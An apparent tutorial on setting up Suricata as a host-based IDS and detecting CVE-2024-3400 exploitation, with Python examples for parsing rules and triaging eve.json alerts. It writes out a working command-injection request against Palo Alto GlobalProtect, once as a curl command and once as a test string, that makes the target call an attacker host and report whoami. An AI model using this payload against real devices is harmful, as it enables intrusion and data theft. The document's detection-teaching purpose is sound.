IDS (Intrusion Detection System) and IPS (Intrusion Prevention System) are basic components of any Security Operation Center that help detect and prevent unauthorized use of computer systems or networks.
While IDSs have detection capabilities, IPSs have prevention capabilities. IDS/IPS systems provide detection and prevention capabilities by analyzing network traffic to detect malicious content. There are two types of IDS/IPS systems in the cybersecurity industry: Host-based and network-based.
“Suricata is a high-performance Network IDS, IPS, and Network Security Monitoring Engine. Suricata is open source and owned by a community-run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF.” (Source: https://docs.suricata.io)
The Suricata source code is licensed under version 2 of the GNU General Public License.
Now we will install and configure Suricata on Ubuntu as a host-based intrusion detection system, which is the default mode.
First, we should update the packages on Ubuntu with the following command:
sudo apt-get update
Now, we are ready to install Suricata.
Installing Suricata on Ubuntu is quite easy. All we need to do is to use the following command:
sudo apt-get install suricata -y
To find out the Suricata version on Ubuntu, just type the following command:
suricata -V
After installing Suricata, you can examine the status of the Suricata service with the following command:
systemctl status suricata
Suricata runs according to information in the /etc/suricata/suricata.yml file. The most important part of the configuration file /etc/suricata/suricata.yml is the part where we specify which network address and which interface Suricata is to monitor. In this case, we will monitor the Ubuntu network interface card and acquire the IP address of the Ubuntu machine.
Using the following command, let's check the network interface card of the Ubuntu machine and its IP address:
ip a
Before editing the configuration file, we should stop the Suricata service with the following command:
systemctl stop suricata
Now open the Suricata configuration file with your favorite text editor. First, change the HOME_NET variable to 172.16.101.132/32, then change the interface to ens160 in the af-packet section. Don't forget to save your changes.
sudo vim /etc/suricata/suricata.yml
Another important point in the configuration is the location of the rule file. Suricata's rule files are specified in the default rule path in the configuration file /etc/suricata/suricata.yml.
By default, Suricata reads its rules from the file /var/lib/suricata/rules/suricata.rules, so that is where the loaded Suricata rules can be found.
We can download and update Emerging Threats rules on the Suricata with the following command:
sudo suricata-update
Now, we can launch the Suricata service with the following command:
systemctl start suricata
Then check the status of the Suricata service with the following command:
systemctl status suricata
To protect our environment, understanding the Suricata rule structure is critical. Let's work through an example case to put theory into practice.
First, search for the cve-2024-3400 Palo Alto Command Injection Vulnerability rule in the suricata.rules file using the following command:
sudo cat /var/lib/suricata/rules/suricata.rules | grep CVE-2024-3400
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400)"; flow:established,to_server; http.cookie; content:"SESSID="; startswith; content:"/opt/panlogs/tmp/device_telemetry/"; within:80; fast_pattern; content:"|60|"; within:21; content:"|24 7b|IFS|7d|"; within:30; reference:cve,2024-3400; reference:url,labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/; classtype:trojan-activity; sid:2052122; rev:1; metadata:affected_product Palo_Alto_Networks, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2024_04_16, cve CVE_2024_3400, deployment Perimeter, deployment Internal, deployment SSLDecrypt, former_category WEB_SPECIFIC_APPS, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_04_16; target:dest_ip;)
This rule generates an alert if all of the following conditions are met:
- the traffic is HTTP from any source to $HOME_NET, on an established flow in the to_server direction;
- the Cookie header (the http.cookie buffer) starts with SESSID=;
- /opt/panlogs/tmp/device_telemetry/ appears within 80 bytes after that;
- a backtick (|60|) appears within 21 bytes after that path;
- ${IFS} (|24 7b|IFS|7d|) appears within 30 bytes after the backtick.
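To make the rule structure concrete, here is an added example (not code from the article or from Suricata) that parses the rule header and option body into its parts and then walks the http.cookie content chain the way the modifiers describe it. The rule string is a copy of the signature above with its long metadata option trimmed; the matcher is a simplified model of Suricata's startswith and within semantics written for this example, not Suricata's own engine.

```python
import re

# Constructed sample input: the ET signature examined above (sid 2052122), copied from the
# suricata.rules output with its long metadata option trimmed to keep the sample readable.
RULE = (
    'alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect '
    'Session Cookie Command Injection Attempt (CVE-2024-3400)"; flow:established,to_server; '
    'http.cookie; content:"SESSID="; startswith; content:"/opt/panlogs/tmp/device_telemetry/"; '
    'within:80; fast_pattern; content:"|60|"; within:21; content:"|24 7b|IFS|7d|"; within:30; '
    'reference:cve,2024-3400; classtype:trojan-activity; sid:2052122; rev:1; target:dest_ip;)'
)

# Cookie value taken from the curl request shown in the article (constructed test input).
MALICIOUS_COOKIE = (b"SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa"
                    b"`curl${IFS}172.16.101.131:4444?user=$(whoami)`")

# action proto src sport dir dst dport (options)
HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)
# Keywords that modify the content keyword immediately before them.
CONTENT_MODIFIERS = {"within", "distance", "depth", "offset", "startswith",
                     "endswith", "fast_pattern", "nocase"}


def split_options(opts: str) -> list:
    """Split the option body on ';' while leaving ';' inside double quotes alone."""
    items, buf, in_quotes = [], [], False
    for ch in opts:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            if "".join(buf).strip():
                items.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    if "".join(buf).strip():
        items.append("".join(buf).strip())
    return items


def decode_content(pattern: str) -> bytes:
    """Decode Suricata content syntax: text outside |..| is literal, inside |..| is hex bytes."""
    out = bytearray()
    for i, part in enumerate(pattern.split("|")):
        out += bytes.fromhex(part.replace(" ", "")) if i % 2 else part.encode()
    return bytes(out)


def parse_rule(rule: str) -> dict:
    """Return header fields, key options, and the ordered list of content matches."""
    m = HEADER_RE.match(rule.strip())
    if not m:
        raise ValueError("not a Suricata rule")
    options, contents, buffer = {}, [], None
    for item in split_options(m.group("opts")):
        key, _, value = item.partition(":")
        key, value = key.strip(), value.strip().strip('"')
        if key == "content":
            contents.append({"buffer": buffer, "pattern": value})
        elif key in CONTENT_MODIFIERS and contents:
            contents[-1][key] = value if value else True      # e.g. within:80, startswith
        elif not value and key.startswith("http."):
            buffer = key                                      # sticky buffer, e.g. http.cookie
        else:
            options.setdefault(key, []).append(value)
    return {"action": m.group("action"), "proto": m.group("proto"), "src": m.group("src"),
            "sport": m.group("sport"), "direction": m.group("dir"), "dst": m.group("dst"),
            "dport": m.group("dport"), "sid": int(options["sid"][0]),
            "rev": int(options["rev"][0]), "msg": options["msg"][0],
            "classtype": options.get("classtype", [None])[0],
            "references": options.get("reference", []), "contents": contents}


def cookie_matches(parsed: dict, cookie: bytes) -> bool:
    """Simplified model of the content chain: 'startswith' anchors the pattern at offset 0;
    'within:N' requires the next pattern to lie entirely inside the N bytes after the
    previous match. Every pattern must be found in order, or the rule does not fire."""
    cursor = 0
    for match in parsed["contents"]:
        pat = decode_content(match["pattern"])
        if match.get("startswith"):
            if not cookie.startswith(pat):
                return False
            cursor = len(pat)
        elif "within" in match:
            idx = cookie[cursor:cursor + int(match["within"])].find(pat)
            if idx < 0:
                return False
            cursor += idx + len(pat)
        else:
            idx = cookie.find(pat, cursor)
            if idx < 0:
                return False
            cursor = idx + len(pat)
    return True


if __name__ == "__main__":
    parsed = parse_rule(RULE)
    print(parsed["sid"], parsed["action"], parsed["proto"], parsed["src"], "->", parsed["dst"])
    for c in parsed["contents"]:
        print(" ", c["buffer"], decode_content(c["pattern"]), {k: v for k, v in c.items() if k not in ("buffer", "pattern")})
    print("malicious cookie fires:", cookie_matches(parsed, MALICIOUS_COOKIE))
    print("plain cookie fires:", cookie_matches(parsed, b"SESSID=abc123"))
```

Running it shows why the rule is tight: a cookie that merely contains the telemetry path does not fire, because the backtick and ${IFS} have to follow within the stated byte windows, and the fast_pattern flag on the path tells the engine which content to use for the initial multi-pattern search.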
Now we send the CVE-2024-3400 exploit request from the attacker's machine with the following command:
curl http[:]//172[.]16.101.132/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}172[.]16.101.131:4444?user=$(whoami)`'
Let's have a look at exploitation attempts with Suricata. Suricata logs are stored in the file /var/log/suricata/eve.json by default. To display the logs neatly, we can use jq. To view exploitation attempts, use the following command:
cat /var/log/suricata/eve.json | grep CVE-2024-3400 | jq .
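Beyond a grep, an analyst usually wants the alerts summarised by source, destination and signature id, and the parser has to cope with the partial last line that an actively written eve.json often has. The following added example (not code from the article or from Suricata) does that over a constructed set of eve.json records modelled on Suricata's alert and http event layout; the field values, the unrelated signature id 9000001 and the timestamps are all made up for the sample.

```python
import json
from collections import Counter

# Constructed sample of /var/log/suricata/eve.json lines (not captured from a real sensor):
# one alert for the CVE-2024-3400 signature examined above, one plain http record, one alert
# for an unrelated made-up signature, and one truncated line such as a live log can contain.
SAMPLE_EVE = r'''
{"timestamp":"2024-05-01T10:15:02.123456+0000","flow_id":1,"event_type":"alert","src_ip":"172.16.101.131","src_port":51234,"dest_ip":"172.16.101.132","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2052122,"rev":1,"signature":"ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400)","category":"A Network Trojan was detected","severity":1,"metadata":{"cve":["CVE_2024_3400"],"signature_severity":["Major"]}},"http":{"hostname":"172.16.101.132","url":"/global-protect/login.esp","http_user_agent":"curl/8.5.0","http_method":"GET","protocol":"HTTP/1.1","status":404}}
{"timestamp":"2024-05-01T10:15:03.000000+0000","flow_id":2,"event_type":"http","src_ip":"172.16.101.131","src_port":51234,"dest_ip":"172.16.101.132","dest_port":80,"proto":"TCP","http":{"hostname":"172.16.101.132","url":"/global-protect/login.esp","http_method":"GET","status":404}}
{"timestamp":"2024-05-01T10:16:40.500000+0000","flow_id":3,"event_type":"alert","src_ip":"172.16.101.131","src_port":51240,"dest_ip":"172.16.101.132","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":9000001,"rev":1,"signature":"EXAMPLE unrelated signature (constructed)","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2024-05-01T10:17:00.000000+0000","flow_id":4,"event_type":"alert","src_ip":"10.0.0.5"
'''


def load_events(text: str) -> list:
    """Parse eve.json line by line; skip blank or truncated lines instead of aborting."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # partial record: the sensor is still appending to the file
    return events


def is_cve_alert(event: dict, cve: str = "CVE-2024-3400") -> bool:
    """True for alert records whose signature name or ET metadata carries the CVE."""
    if event.get("event_type") != "alert":
        return False
    alert = event.get("alert", {})
    if cve in alert.get("signature", ""):
        return True
    # ET metadata writes the CVE with underscores (cve CVE_2024_3400 in the rule above).
    return cve.replace("-", "_") in alert.get("metadata", {}).get("cve", [])


def triage(text: str, cve: str = "CVE-2024-3400") -> dict:
    """Summarise matching alerts: who hit what, with which signature, and whether the
    engine only logged (IDS, action 'allowed') or blocked (IPS, action 'blocked')."""
    hits = [e for e in load_events(text) if is_cve_alert(e, cve)]
    pairs = Counter((e["src_ip"], e["dest_ip"], e["alert"]["signature_id"]) for e in hits)
    return {
        "count": len(hits),
        "sources": sorted({e["src_ip"] for e in hits}),
        "pairs": dict(pairs),
        "actions": sorted({e["alert"]["action"] for e in hits}),
        "urls": sorted({e.get("http", {}).get("url", "") for e in hits}),
    }


if __name__ == "__main__":
    # Same idea as the grep/jq pipeline above, but with a structured summary.
    summary = triage(SAMPLE_EVE)
    print(f"{summary['count']} alert(s) for CVE-2024-3400 from {summary['sources']}")
    for (src, dst, sid), n in summary["pairs"].items():
        print(f"  {src} -> {dst} sid {sid}: {n}")
    print("engine action(s):", summary["actions"], "url(s):", summary["urls"])
```

To run it against a real sensor, replace SAMPLE_EVE with the contents of /var/log/suricata/eve.json. The action field is worth watching: in the host-based IDS mode used in this article it reads allowed, meaning the request was logged but not dropped. Note also the rule's tls_state TLSDecrypt metadata: the same request sent over HTTPS would not be visible to this HTTP rule unless the traffic is decrypted before Suricata sees it.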
Suricata is an open-source IDS/IPS and network monitoring system that is widely used in the cybersecurity industry due to its large community and ease of use. Suricata can be used for various tasks such as:
In this article, we explained how to install Suricata as a host-based IDS, install Suricata rules from the Emerging Threats signature database, analyze the CVE-2024-3400 signature, and finally detect CVE-2024-3400 exploitation attempts with Suricata.